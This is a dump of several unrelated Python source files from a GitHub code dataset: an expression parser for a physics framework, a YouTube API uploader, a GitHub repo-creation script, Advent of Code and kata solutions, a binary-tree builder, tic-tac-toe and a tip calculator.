Queue Reconstruction by Height.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"73486366515","text":"from gna.configurator import NestedDict\nfrom gna.expression.preparse import open_fcn\nfrom gna.expression.operation import *\nfrom gna.env import env\nimport re\nimport inspect\n\nclass VTContainer(dict):\n _order=None\n def __init__(self, *args, **kwargs):\n super(VTContainer, self).__init__(*args, **kwargs)\n\n def set_indices(self, indices):\n self._order=indices.order\n\n def __missing__(self, key):\n newvar = Variable(key, order=self._order)\n self[key] = newvar\n return newvar\n\n def __setitem__(self, key, value):\n if isinstance(value, Indexed):\n if value.name is undefinedname and key!='__tree__':\n value.name = key\n value.nindex.arrange(self._order)\n value.expandable=False\n elif inspect.isclass(value) and issubclass(value, Operation):\n value.order=self._order\n\n dict.__setitem__(self, key, value)\n return value\n\nclass Expression(object):\n operations = dict(sum=OSum, prod=OProd, concat=OConcat, accumulate=Accumulate, bracket=bracket)\n tree = None\n def __init__(self, expression, indices=[], **kwargs):\n if isinstance(expression, str):\n self.expressions_raw = [expression]\n elif isinstance(expression, (tuple, list)):\n self.expressions_raw = list(expression)\n else:\n raise Exception('Unsupported expression: {!r}'.format(expression))\n\n cexpr = re.compile('\\\\s*#.*')\n rexpr = re.compile('\\n\\\\s+')\n self.expressions_raw = [ rexpr.sub('', cexpr.sub('', e)) for e in self.expressions_raw ]\n self.expressions = [open_fcn(expr) for expr in self.expressions_raw]\n\n self.globals=VTContainer()\n self.defindices(indices, **kwargs)\n self.set_operations()\n\n def set_operations(self):\n for name, op in self.operations.items():\n self.globals[name]=op\n\n def parse(self):\n if self.tree:\n raise Exception('Expression is already parsed')\n\n self.trees = []\n for expr in self.expressions:\n texpr = '__tree__ = '+expr\n try:\n exec(texpr, self.globals, self.globals)\n tree = self.globals.pop('__tree__')\n except:\n print('Failed to evaluate expression:')\n print(expr)\n raise\n self.trees.append(tree)\n\n self.tree=self.trees[-1]\n\n def guessname(self, ilib, *args, **kwargs):\n lib = dict()\n for k, v in ilib.items():\n v['name'] = k\n lib[v['expr']] = v\n for tree in self.trees:\n tree.guessname(lib, *args, **kwargs)\n\n def __str__(self):\n return self.expressions_raw\n\n def __repr__(self):\n return 'Expression(\"{}\")'.format(self.expressions_raw)\n\n def defindices(self, defs):\n if isinstance(defs, NIndex):\n self.nindex = defs\n else:\n self.nindex = NIndex.fromlist(defs)\n for short, idx in self.nindex.indices.items():\n self.globals[short] = idx\n\n slave=idx.slave\n if slave:\n self.globals[slave.short]=slave\n self.globals.set_indices(self.nindex)\n\n def build(self, context):\n if not self.tree:\n raise Exception('Expression is not initialized, call parse() method first')\n\n context.set_indices(self.nindex)\n for tree in self.trees:\n creq = tree.require(context)\n\n context.build_bundles()\n\n with context:\n for tree in self.trees:\n tree.bind(context)\n\nclass ExpressionContext(object):\n indices = None\n def __init__(self, cfg, ns=None, inputs=None, outputs=None):\n self.executed_bundles = []\n self.required = dict()\n\n self.cfg = cfg\n self.outputs = NestedDict() if outputs is None else outputs\n self.inputs = NestedDict() if inputs is None else inputs\n 
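        # (Hedged editorial comment, not in the original source: the providers
        # loop a few lines below inverts the bundle configuration. Every name a
        # bundle lists under its `provides` field, plus the bundle's own key,
        # becomes a lookup key pointing back at that bundle's cfg; require()
        # consults this mapping when an expression node asks for an output.)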
self.ns = ns or env.globalns\n\n self.providers = dict()\n for keys, value in cfg.items():\n if isinstance(value, NestedDict) and 'provides' in value:\n value.provides+=[keys]\n keys=value.provides\n\n if not isinstance(keys, (list, tuple)):\n keys=keys,\n\n for key in keys:\n self.providers[key]=value\n\n def __enter__(self):\n self.ns.__enter__()\n\n def __exit__(self, *args, **kwargs):\n self.ns.__exit__(*args, **kwargs)\n\n def namespace(self):\n return self.ns\n\n def set_indices(self, indices):\n self.nindex = indices\n\n @methodname\n def require(self, name, indices):\n cfg = self.required.get(name, None)\n if cfg is None:\n cfg = self.providers.get(name, None)\n if cfg is None:\n if indices:\n for it in indices.iterate():\n self.require(it.current_format(name=name), None)\n return self.required\n\n raise Exception('Do not know how to build '+name)\n\n self.required[name] = cfg\n\n if indices is None:\n printl_debug( 'indices: %s'%(name) )\n return self.required\n\n predefined = cfg.get('indices', None)\n if predefined is None:\n printl_debug( 'indices: %s[%s]'%(name, str(indices)) )\n cfg.indices=indices\n elif not isinstance(predefined, NIndex):\n raise Exception('Configuration should not contain predefined \"indices\" field')\n else:\n printl_debug( 'indices: %s[%s + %s]'%(name, str(predefined), str(indices)) )\n cfg.indices=predefined+indices\n\n return self.required\n\n def build_bundles(self):\n with self.ns:\n done = set()\n for cfg in self.required.values():\n if cfg in done:\n continue\n self.build_bundle(cfg)\n done.add(cfg)\n\n def build_bundle(self, cfg):\n printl_debug('build bundle', cfg.bundle )\n\n from gna.bundle import execute_bundles\n with nextlevel():\n b=execute_bundles( cfg=cfg, context=self )\n\n self.executed_bundles.append(b)\n\n def get_variable(self, name, *idx):\n pass\n\n def get_key(self, name, nidx, fmt=None, clone=None):\n if nidx is None:\n nidx = NIndex()\n if clone is not None:\n clone = '%02d'%clone\n\n if fmt:\n ret = ndix.current_format(fmt)\n if clone:\n ret += '.'+clone\n return ret\n\n nidx = nidx.current_values()\n if clone:\n nidx = nidx + (clone,)\n return (name,)+nidx\n\n def get_output(self, name, nidx=None, clone=None):\n return self.get( self.outputs, name, nidx, 'output', clone=clone )\n\n def set_output(self, output, name, nidx=None, fmt=None, **kwargs):\n import ROOT as R\n if isinstance(output, R.TransformationTypes.OutputHandle):\n output = R.OutputDescriptor(output)\n self.set( self.outputs, output, name, nidx, 'output', fmt, **kwargs )\n return output\n\n def get_input(self, name, nidx=None, clone=None):\n return self.get( self.inputs, name, nidx, 'input', clone=clone )\n\n def set_input(self, input, name, nidx=None, fmt=None, clone=None):\n self.set( self.inputs, input, name, nidx, 'input', fmt, clone)\n return input\n\n def get(self, source, name, nidx, type, clone=None):\n key = self.get_key(name, nidx, clone=clone)\n printl_debug('get {}'.format(type), name, key)\n\n ret = source.get(key, None)\n if not ret:\n raise Exception('Failed to get {} {}[{}]'.format(type, name, nidx, clone))\n\n if isinstance(ret, NestedDict):\n raise Exception('Incomplete index ({!s}) provided (probably). 
Need at least resolve {!s}'.format(nidx, list(ret.keys())))\n\n return ret\n\n def set(self, target, io, name, nidx, type, fmt=None, clone=None):\n key = self.get_key( name, nidx, fmt, clone )\n printl_debug('set {}'.format(type), name, key)\n target[key]=io\n\n def set_variable(self, name, nidx, var, **kwargs):\n key = '.'.join(self.get_key( name, nidx ))\n printl_debug('set variable', name, key)\n self.ns.reqparameter(key, cfg=var, **kwargs)\n\n # def connect(self, source, sink, nidx, fmtsource=None, fmtsink=None):\n # printl_debug( 'connect: {}->{} ({:s})'.format( source, sink, nidx ) )\n # with nextlevel():\n # output = self.get_output( source, nidx )\n # input = self.get_input( sink, nidx )\n\n # input( output )\n","repo_name":"gnafit/gna","sub_path":"pylib/gna/expression/expression_v00.py","file_name":"expression_v00.py","file_ext":"py","file_size_in_byte":8675,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"23278631535","text":"def format_duration(seconds):\n if seconds == 0:\n return 'now'\n\n s = seconds % 60\n m = seconds % 3600 // 60\n h = seconds % 86400 // 3600\n d = seconds % 31536000 // 86400\n y = seconds // 31536000\n\n A = [y, d, h, m, s]\n b = ['year', 'day', 'hour', 'minute', 'second']\n out = []\n\n for x, y in zip(A, b):\n if x == 1:\n out.append(f'{x} {y}')\n elif x > 1:\n out.append(f'{x} {y}s')\n\n if len(out) > 1:\n return ', '.join(out[:-1]) + ' and ' + out[-1]\n return ''.join(out)\n\nprint(format_duration(3662))","repo_name":"Ramza-i/CW_solutions","sub_path":"examples/Human readable duration format.py","file_name":"Human readable duration format.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72323911473","text":"def calc_distance(head, tail):\n distance = (head[0] - tail[0]) ** 2 + (head[1] - tail[1]) ** 2\n return distance\n\n\ndef is_tail_adjacent(head, tail):\n distance = calc_distance(head, tail)\n if distance <= 1:\n return True\n\n # diag is distance 2 but considered adjacent for this problem\n if (abs(head[0] - tail[0]) == 1) and (abs(head[1] - tail[1]) == 1):\n return True\n else:\n return False\n\n\ndef move_head(head, direction):\n if direction == \"L\":\n head[1] -= 1\n elif direction == \"R\":\n head[1] += 1\n elif direction == \"U\":\n head[0] += 1\n elif direction == \"D\":\n head[0] -= 1\n\n return head\n\n\ndef move_tail_linearly(head, tail):\n if head[0] == tail[0]:\n if head[1] > tail[1]:\n tail[1] += 1\n else:\n tail[1] -= 1\n else:\n if head[0] > tail[0]:\n tail[0] += 1\n else:\n tail[0] -= 1\n return head, tail\n\n\ndef move_tail_diag(head, tail):\n if head[0] > tail[0]:\n tail[0] += 1\n else:\n tail[0] -= 1\n\n if head[1] > tail[1]:\n tail[1] += 1\n else:\n tail[1] -= 1\n\n return head, tail\n\n\ndef move_tail(head, tail):\n if head[0] == tail[0] or head[1] == tail[1]:\n head, tail = move_tail_linearly(head, tail)\n else:\n head, tail = move_tail_diag(head, tail)\n\n return head, tail\n\n\ndef main():\n\n with open(\"input.txt\") as file:\n\n head = [0, 0]\n tail = [0, 0]\n position_map = {}\n position_map[(tail[0], tail[1])] = True\n for instruction in file.read().split(\"\\n\"):\n [dir, times] = instruction.split(\" \")\n for i in range(int(times)):\n head = move_head(head, dir)\n\n if is_tail_adjacent(head, tail):\n continue\n else:\n head, tail = move_tail(head, tail)\n position_map[(tail[0], tail[1])] = True\n\n print(len(position_map))\n\n # part 2\n with 
open(\"input.txt\") as file:\n\n head = [0, 0]\n tails = []\n for i in range(9):\n tails.append([0, 0])\n position_map = {}\n position_map[(0, 0)] = True\n for instruction in file.read().split(\"\\n\"):\n [dir, times] = instruction.split(\" \")\n for i in range(int(times)):\n head = move_head(head, dir)\n\n tmp_head = head\n for tail in tails:\n if is_tail_adjacent(tmp_head, tail):\n tmp_head = tail\n continue\n else:\n tmp_head, tail = move_tail(tmp_head, tail)\n tmp_head = tail\n\n position_map[(tails[8][0], tails[8][1])] = True\n\n print(len(position_map))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Jesavino/advent_of_code","sub_path":"2022/9/rope-bridge/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"19849997882","text":"from RandomCoefficientsGenerator import RandSystem\nfrom ThreeVarSystem import ThreeSystemLinearEquation\nfrom TwoVarSystem import TwoSystemLinearEquation\nfrom Printer import SystemsPrinter\n\nfirst_matrix = RandSystem.generate_random_system(2)\nfirst_sys = TwoSystemLinearEquation(first_matrix)\nSystemsPrinter.print_system(first_sys)\nfirst_roots = first_sys.matrix_method()\nSystemsPrinter.print_roots(first_roots)\n\nsecond_matrix = RandSystem.generate_random_system(2)\nsecond_sys = TwoSystemLinearEquation(second_matrix)\nSystemsPrinter.print_system(second_sys)\nsecond_roots = second_sys.kramer_method()\nSystemsPrinter.print_roots(second_roots)\n\nthird_matrix = RandSystem.generate_random_system(3)\nthird_sys = ThreeSystemLinearEquation(third_matrix)\nSystemsPrinter.print_system(third_sys)\nthird_roots = third_sys.matrix_method()\nSystemsPrinter.print_roots(third_roots)\n\nfourth_matrix = RandSystem.generate_random_system(3)\nfourth_sys = ThreeSystemLinearEquation(fourth_matrix)\nSystemsPrinter.print_system(fourth_sys)\nfourth_roots = fourth_sys.matrix_method()\nSystemsPrinter.print_roots(fourth_roots)\n","repo_name":"mshabanov27/LabOP2","sub_path":"Lab5/Python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72107993393","text":"# -*- coding:UTF-8 -*-\n\n'''\n中序序列和层序序列构造二叉树\n\n思路:\n参见\n\n编程环境:\nPython3.5.2\n\n作者:\nCSDN博客:https://my.csdn.net/yeqiang19910412\nGithub:https://github.com/YeQiang1075736553\n\n日期:\n2018.8.13\n'''\n\nclass Node():\n \"\"\"节点类\"\"\"\n def __init__(self,data=None,lchild=None,rchild=None):\n self.data = data # 表示数据域\n self.lchild = lchild # 表示左子树\n self.rchild = rchild # 表示右子树\n\nclass BinaryTree():\n def __init__(self):\n pass\n\n def in_level_construct_tree(self,mid_order,level_order):\n \"\"\"根据中序序列和层序序列构造二叉树\"\"\"\n if len(mid_order)==0 or len(level_order)==0:\n return None\n # 层序遍历的第一个结点一定是根结点\n root_data = level_order[0]\n root = Node(root_data)\n i = mid_order.index(root_data)\n\n Lin = mid_order[:i] # 利用层序遍历确定的根节点划分出左右子树\n Rin = mid_order[i+1:]\n\n Llevel = []\n Rlevel = []\n for i in range(len(level_order)): # 通过中序序列,找到层序序列中相同的左右子树元素,并按顺序排列\n for j in range(len(Lin)):\n if level_order[i] == Lin[j]:\n Llevel.append(level_order[i])\n for i in range(len(level_order)):\n for j in range(len(Rin)):\n if level_order[i] == Rin[j]:\n Rlevel.append(level_order[i])\n\n root.lchild = self.in_level_construct_tree(Lin,Llevel)\n root.rchild = self.in_level_construct_tree(Rin,Rlevel)\n\n return root\n\n def pre_order_traverse(self,root):\n \"\"\"递归实现前序遍历\"\"\"\n if root == 
None:\n return\n print(root.data,end=\" \")\n self.pre_order_traverse(root.lchild)\n self.pre_order_traverse(root.rchild)\n\n def in_order_traverse(self,root):\n \"\"\"递归实现后序遍历\"\"\"\n if root == None:\n return\n self.in_order_traverse(root.lchild)\n print(root.data,end=\" \")\n self.in_order_traverse(root.rchild)\n\n def post_order_traverse(self,root):\n \"\"\"递归实现后序遍历\"\"\"\n if root == None:\n return\n self.post_order_traverse(root.lchild)\n self.post_order_traverse(root.rchild)\n print(root.data,end=\" \")\n\n def level_order_traverse(self, root):\n \"\"\"队列实现层序遍历\"\"\"\n if root == None:\n return\n queue = []\n queue.append(root)\n while queue:\n node = queue.pop(0)\n print(node.data, end=\" \")\n if node.lchild != None:\n queue.append(node.lchild)\n if node.rchild != None:\n queue.append(node.rchild)\n\nif __name__ == '__main__':\n str_mid = \"dgbaechf\"\n str_level = \"abcdefgh\"\n mid_order = list(str_mid)\n level_order = list(str_level)\n binary_tree = BinaryTree()\n root = binary_tree.in_level_construct_tree(mid_order,level_order)\n print(\"递归实现前序遍历\")\n binary_tree.pre_order_traverse(root) # 递归实现前���遍历\n print(\"\\n\")\n print(\"递归实现中序遍历\")\n binary_tree.in_order_traverse(root) # 递归实现中序遍历\n print(\"\\n\")\n print(\"递归实现后序遍历\")\n binary_tree.post_order_traverse(root) # 递归实现后序遍历\n print(\"\\n\")\n print(\"队列实现层序遍历\") # 队列实现层序遍历\n binary_tree.level_order_traverse(root)\n\n\n","repo_name":"YeQiang1075736553/DataStructureAndAlgorithm","sub_path":"Python/3、Tree/in_level_Tree.py","file_name":"in_level_Tree.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"10521317292","text":"import time\nimport requests\nimport json\nimport socket\nimport secret\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nwhile True:\n try:\n s.bind(('127.0.0.1', 9876))\n break\n except:\n print(\"Retrying bind to port 9876...\")\n time.sleep(5)\n pass\n\nprint(\"Successfully bound to port 9876\")\n\ns.listen(5)\n\ns, address = s.accept()\nprint(\"Connected to \" + str(address))\n\nmsg = s.recv(1024).decode('utf-8')\nmsg = json.loads(msg)\n\npat = secret.TOKEN\napi = \"https://api.github.com\"\nuser = secret.USER\nprint(msg)\n\nprint(\"Creating repository: \" + msg[\"name\"])\nresponse = requests.post(api + \"/user/repos\", data=json.dumps(msg), headers={\"Authorization\": \"token \" + pat})\nresponse.raise_for_status()\n\nrepo_link = \"https://github.com/\" + user + \"/\" + msg[\"name\"]\n\nif response.status_code == 201:\n new_msg = s.send((\"Created repository at: \" + repo_link).encode('utf-8'))\nelse:\n print(\"Error: repository creation failed\")\n\n\n\n\n","repo_name":"goldstem/CS_361-Microservice","sub_path":"repo_test.py","file_name":"repo_test.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1878035256","text":"# If the bill was $150.00, split between 5 people, with 12% tip.\n\n# Each person should pay (150.00 / 5) * 1.12 = 33.6\n# Format the result to 2 decimal places = 33.60\n\n# Tip: There are 2 ways to round a number. You might have to do some Googling to solve this.💪\n\n# Write your code below this line 👇\n\nprint('Welcome to the tip calculator!')\n\nbill = input('How much was the bill? ')\n\npercentage = input(\n \"How much percentage tip would you like to leave? 10, 12, or 15? \")\n\nguest = input('How many people will be splitting the bill? 
')\n\nbill_in_int = float(bill)\n\npercentage_in_int = int(percentage)\n\nguest_in_int = int(guest)\n\ntip = (percentage_in_int / 100) * bill_in_int\n\nprint(round((tip + bill_in_int) / guest_in_int))\n\n\n# can be refactored and made cleaner.\n","repo_name":"carlpadilla/daily_coding_challenges","sub_path":"Python_challenges/tip_calculator.py","file_name":"tip_calculator.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"27649504778","text":"lst = []\na = int(input(\"Enter number of elements : \"))\n \nfor i in range(0, a):\n ele = int(input())\n \n lst.append(ele) \n\nrecv=[]\nrecv_ack=[]\n\nack_index=1\nstart=1\nend=3\nwhile len(lst)>=len(recv):\n if ack_index %3 ==0:\n print(f\"Ack for index {ack_index} not recieved\")\n print(f\"Sending frames again {start-1} to {end-1}\")\n ack_index+=1\n else:\n print(f\"Sending {start} to {end}\")\n start+=1\n end+=1\n print(f\"Ack recieved for {ack_index}\")\n if ack_index>=len(lst):\n recv.append(lst[ack_index-1])\n ack_index+=1\n ","repo_name":"Snehanjan2001/network-prac-sem","sub_path":"prac_exam_sol/goback.py","file_name":"goback.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"38044687134","text":"#!/usr/bin/python\n# This file is modified from the sample code of Youtube Data API.\n\nimport http.client\nimport httplib2\nimport json\nimport random\nimport time\nimport datetime\nimport google.oauth2.credentials\nimport googleapiclient.discovery\n\nfrom googleapiclient.errors import HttpError\nfrom googleapiclient.http import MediaFileUpload\n\n\n# Explicitly tell the underlying HTTP transport library not to retry, since\n# we are handling retry logic ourselves.\nhttplib2.RETRIES = 1\n\n# Maximum number of times to retry before giving up.\nMAX_RETRIES = 10\n\n# Always retry when these exceptions are raised.\nRETRIABLE_EXCEPTIONS = (\n IOError,\n httplib2.HttpLib2Error, http.client.NotConnected,\n http.client.IncompleteRead, http.client.ImproperConnectionState,\n http.client.CannotSendRequest, http.client.CannotSendHeader,\n http.client.ResponseNotReady, http.client.BadStatusLine,\n)\n\n# Always retry when an apiclient.errors.HttpError with one of these status\n# codes is raised.\nRETRIABLE_STATUS_CODES = [500, 502, 503, 504]\n\nOAUTH_TOKEN_FILE = 'token.json'\n\n# This OAuth 2.0 access scope allows for full read/write access to the\n# authenticated user's account and requires requests to use an SSL connection.\nSCOPES = [\n 'https://www.googleapis.com/auth/youtube',\n 'https://www.googleapis.com/auth/youtube.force-ssl',\n 'https://www.googleapis.com/auth/youtube.readonly',\n 'https://www.googleapis.com/auth/youtube.upload',\n]\nAPI_SERVICE_NAME = 'youtube'\nAPI_VERSION = 'v3'\n\nDEFAULT_PRIVACY_STATUS = 'unlisted'\n\n\ndef save_json_to_file(filename, jsonData):\n with open(filename, 'w') as f:\n json.dump(jsonData, f)\n\n\ndef credentials_to_dict(credentials):\n return {\n 'token': credentials.token,\n 'refresh_token': credentials.refresh_token,\n 'token_uri': credentials.token_uri,\n 'client_id': credentials.client_id,\n 'client_secret': credentials.client_secret,\n 'scopes': credentials.scopes,\n }\n\n\nclass YoutubeService:\n def __init__(self, token_file=OAUTH_TOKEN_FILE):\n self.token_file = token_file\n self.youtube = self._get_youtube_service()\n\n def _get_youtube_service(self): \n credentials = 
google.oauth2.credentials.Credentials.from_authorized_user_file(\n self.token_file)\n original_creds_dict = credentials_to_dict(credentials)\n\n youtube = googleapiclient.discovery.build(\n API_SERVICE_NAME, API_VERSION, credentials=credentials)\n\n # Save credentials back to the token JSON file in case access token was refreshed.\n new_credentials_dict = credentials_to_dict(credentials)\n if original_creds_dict != new_credentials_dict:\n save_json_to_file(self.token_file, new_credentials_dict)\n \n return youtube\n \n def list_live_broadcasts(self):\n request = self.youtube.liveBroadcasts().list(\n part='id,snippet,contentDetails,status',\n mine=True,\n )\n broadcasts = request.execute()\n print('Live Broadcasts:', broadcasts)\n return broadcasts\n \n def list_live_streams(self):\n request = self.youtube.liveStreams().list(\n part='id,cdn,snippet,status',\n mine=True,\n )\n livestreams = request.execute()\n print('Live Streams:', livestreams)\n return livestreams\n \n def start_live_broadcast(self, title, privacyStatus=DEFAULT_PRIVACY_STATUS):\n scheduled_start_time = datetime.datetime.utcnow() + datetime.timedelta(minutes=1)\n body = {\n 'snippet': {\n 'title': title,\n 'scheduledStartTime': scheduled_start_time.isoformat() + 'Z',\n },\n 'status': {\n 'privacyStatus': privacyStatus,\n },\n 'contentDetails': {\n 'enableAutoStart': True,\n 'enableAutoStop': True,\n },\n }\n broadcast_request = self.youtube.liveBroadcasts().insert(\n part='id,snippet,contentDetails,status',\n body=body,\n )\n \n # Response type\n # https://developers.google.com/youtube/v3/live/docs/liveBroadcasts#resource\n broadcast = broadcast_request.execute()\n return broadcast\n \n def start_livestream(self, title):\n body = {\n 'snippet': {\n 'title': title,\n },\n 'cdn': {\n 'frameRate': 'variable',\n 'ingestionType': 'hls',\n 'resolution': 'variable'\n },\n }\n \n request = self.youtube.liveStreams().insert(\n part='id,snippet,cdn,contentDetails,status',\n body=body,\n )\n \n # Response type\n # https://developers.google.com/youtube/v3/live/docs/liveStreams#resource\n livestream = request.execute()\n return livestream\n \n def bind_broadcast_to_livestream(self, broadcast_id, livestream_id):\n # Bind the broadcast to the stream\n bind_request = self.youtube.liveBroadcasts().bind(\n id=broadcast_id,\n part='id,snippet',\n streamId=livestream_id\n )\n \n # Response type\n # https://developers.google.com/youtube/v3/live/docs/liveBroadcasts#resource\n bind_response = bind_request.execute()\n return bind_response\n \n def transition_to_live(self, broadcast_id):\n request = self.youtube.liveBroadcasts().transition(\n broadcastStatus='live',\n id=broadcast_id,\n part='id,snippet,contentDetails,status'\n )\n \n # Response type\n # https://developers.google.com/youtube/v3/live/docs/liveBroadcasts#resource\n response = request.execute()\n return response\n \n \n def upload(self, filepath, title=None, privacyStatus=DEFAULT_PRIVACY_STATUS):\n body = {\n 'snippet': {\n 'title': title,\n },\n 'status': {\n 'privacyStatus': privacyStatus\n },\n }\n\n # Call the API's videos.insert method to create and upload the video.\n insert_request = self.youtube.videos().insert(\n part=','.join(list(body.keys())),\n body=body,\n # Setting 'chunksize' equal to -1 in the code below means that the entire\n # file will be uploaded in a single HTTP request. 
(If the upload fails,\n # it will still be retried where it left off.)\n media_body=MediaFileUpload(filepath, chunksize=-1, resumable=True)\n )\n\n self.resumable_upload(insert_request)\n\n # This method implements an exponential backoff strategy to resume a\n # failed upload.\n def resumable_upload(self, insert_request):\n response = None\n error = None\n retry = 0\n while response is None:\n try:\n print('Uploading file...')\n status, response = insert_request.next_chunk()\n if response is not None:\n if 'id' in response:\n print('Video id \"%s\" was successfully uploaded.' % response['id'])\n else:\n exit('The upload failed with an unexpected response: %s' % response)\n except HttpError as e:\n if e.resp.status in RETRIABLE_STATUS_CODES:\n error = 'A retriable HTTP error %d occurred:\\n%s' % (e.resp.status,\n e.content)\n else:\n raise\n except RETRIABLE_EXCEPTIONS as e:\n error = 'A retriable error occurred: %s' % e\n\n if error is not None:\n print(error)\n retry += 1\n if retry > MAX_RETRIES:\n exit('No longer attempting to retry.')\n\n max_sleep = 2 ** retry\n sleep_seconds = random.random() * max_sleep\n print('Sleeping %f seconds and then retrying...' % sleep_seconds)\n time.sleep(sleep_seconds)\n\n'''\nif __name__ == '__main__':\n argparser.add_argument('--file', required=True, help='Video file to upload')\n argparser.add_argument('--title', help='Video title', default='Test Title')\n argparser.add_argument('--description', help='Video description',\n default='Test Description')\n argparser.add_argument('--category', default='22',\n help='Numeric video category. ' +\n 'See https://developers.google.com/youtube/v3/docs/videoCategories/list')\n argparser.add_argument('--keywords', help='Video keywords, comma separated',\n default='')\n argparser.add_argument('--privacyStatus', choices=VALID_PRIVACY_STATUSES,\n default=VALID_PRIVACY_STATUSES[0], help='Video privacy status.')\n args = argparser.parse_args()\n\n if not os.path.exists(args.file):\n exit('Please specify a valid file using the --file= parameter.')\n\n youtube = get_youtube_service(args)\n try:\n initialize_upload(youtube, args)\n except HttpError as e:\n print('An HTTP error %d occurred:\\n%s' % (e.resp.status, e.content))\n'''","repo_name":"c-rainbow/stream-youtube-uploader","sub_path":"youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":8288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"30700548666","text":"# Imports\nimport os\nimport random\n\n# Functions\ndef clearConsole():\n command = 'clear'\n if os.name in ('nt', 'dos'): # If Machine is running on Windows, use cls\n command = 'cls'\n os.system(command)\n\n\ndef display_board(board):\n clearConsole()\n disboard=''\n for row in [7,4,1]:\n disboard+= ' | '.join(board[row:row+3])+ '\\n'\n\n print(disboard)\n \ndef player_input():\n choice=['X','O']\n while True:\n player = input('Please choose X or O: ').upper()\n if player in choice:\n if player=='X':\n firstplayermarker='X'\n secondplayermarker='O'\n elif player=='O':\n firstplayermarker='O'\n secondplayermarker='X'\n return (firstplayermarker,secondplayermarker)\n else:\n print('Sorry! 
Please choose either X or O') \n\ndef place_marker(board, marker, position):\n if position in range(1,10):\n board[position]=marker\n return board\n\ndef win_check(board, mark):\n #horizonal\n if all(m == mark for m in board[1:4] ) or all(m == mark for m in board[4:7]) or all(m == mark for m in board[7:10]):\n print(f'Player {mark} wins the game')\n return True\n #vertical\n elif all(m == mark for m in board[1:8:3]) or all(m == mark for m in board[2:9:3]) or all(m == mark for m in board[3:10:3] ):\n print(f'Player {mark} wins the game')\n return True \n #diagonal\n elif all(m == mark for m in board[1:10:4] ) or all(m == mark for m in board[3:8:2]):\n print(f'Player {mark} wins the game')\n return True\n else:\n return False\n \ndef choose_first():\n first = random.randint(1,2)\n if first==1:\n print('Player 1 goes first.')\n else:\n print('Player 2 goes first.')\n\ndef space_check(board, position):\n if board[position]=='' or board[position]==' ':\n freespace= True\n return freespace\n else:\n freespace= False\n return freespace\n\ndef full_board_check(board):\n for fullboard in board[1:10]:\n if fullboard==' ':\n return False\n print('Game is a Tie!')\n return True \n \ndef player_choice(board):\n positionchoice=False\n while positionchoice==False:\n position=input('Choose position [1,9]: ')\n if position.isdigit():\n position=int(position)\n else:\n print('This is not a digit, try again.')\n continue\n if position in range(1,10) :\n positionchoice=space_check(board,position)\n else:\n print('Please choose a valid position [1,9].')\n return position\n\ndef replay():\n inputcheck=False\n while inputcheck==False:\n playagainchoice = input('Do you want to play again? Y or N. ').upper()\n if playagainchoice== 'Y' or playagainchoice=='N':\n if playagainchoice=='Y':\n playchoice = True\n else:\n playchoice = False\n inputcheck=True\n else:\n print('Please choose a valid answer, Y or N.\\n')\n inputcheck=False\n\n return playchoice\n\n# Game Code\nprint('Welcome to Tic Tac Toe!')\nrow1 = ' 1 | 2 | 3 '\nrow2 = ' 4 | 5 | 6 '\nrow3 = ' 7 | 8 | 9 '\nprint(row3)\nprint(row2)\nprint(row1)\n\nplayagain = True\nwhile playagain == True:\n # Set the game up here\n choose_first()\n (firstplayermarker, secondplayermarker) = player_input()\n game_off = False\n board = ['#', ' ', ' ',' ', ' ', ' ', ' ', ' ', ' ', ' ']\n while game_off == False:\n #Player 1 Turn\n position = player_choice(board)\n place_marker(board, firstplayermarker, position)\n display_board(board)\n game_off = win_check(board, firstplayermarker)\n if game_off:\n break\n game_off = full_board_check(board)\n if game_off:\n break\n print(f\"{secondplayermarker}'s Turn\")\n\n # Player2's turn.\n position = player_choice(board)\n place_marker(board, secondplayermarker, position)\n display_board(board)\n game_off = win_check(board, secondplayermarker)\n if game_off:\n break\n game_off = full_board_check(board)\n if game_off:\n break\n print(f\"{firstplayermarker}'s Turn\")\n\n playagain = replay()\n ","repo_name":"YMuflahi/TicTacToe-Python","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"25318146341","text":"from WindPy import w\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\nimport cPickle\n\n# start wind\nw.start()\n\n# load the classifier\nwith open('lr_classifier.pkl', 'rb') as fid:\n model_loaded = cPickle.load(fid)\n\nprint(\"\\n\")\n\nwhile 
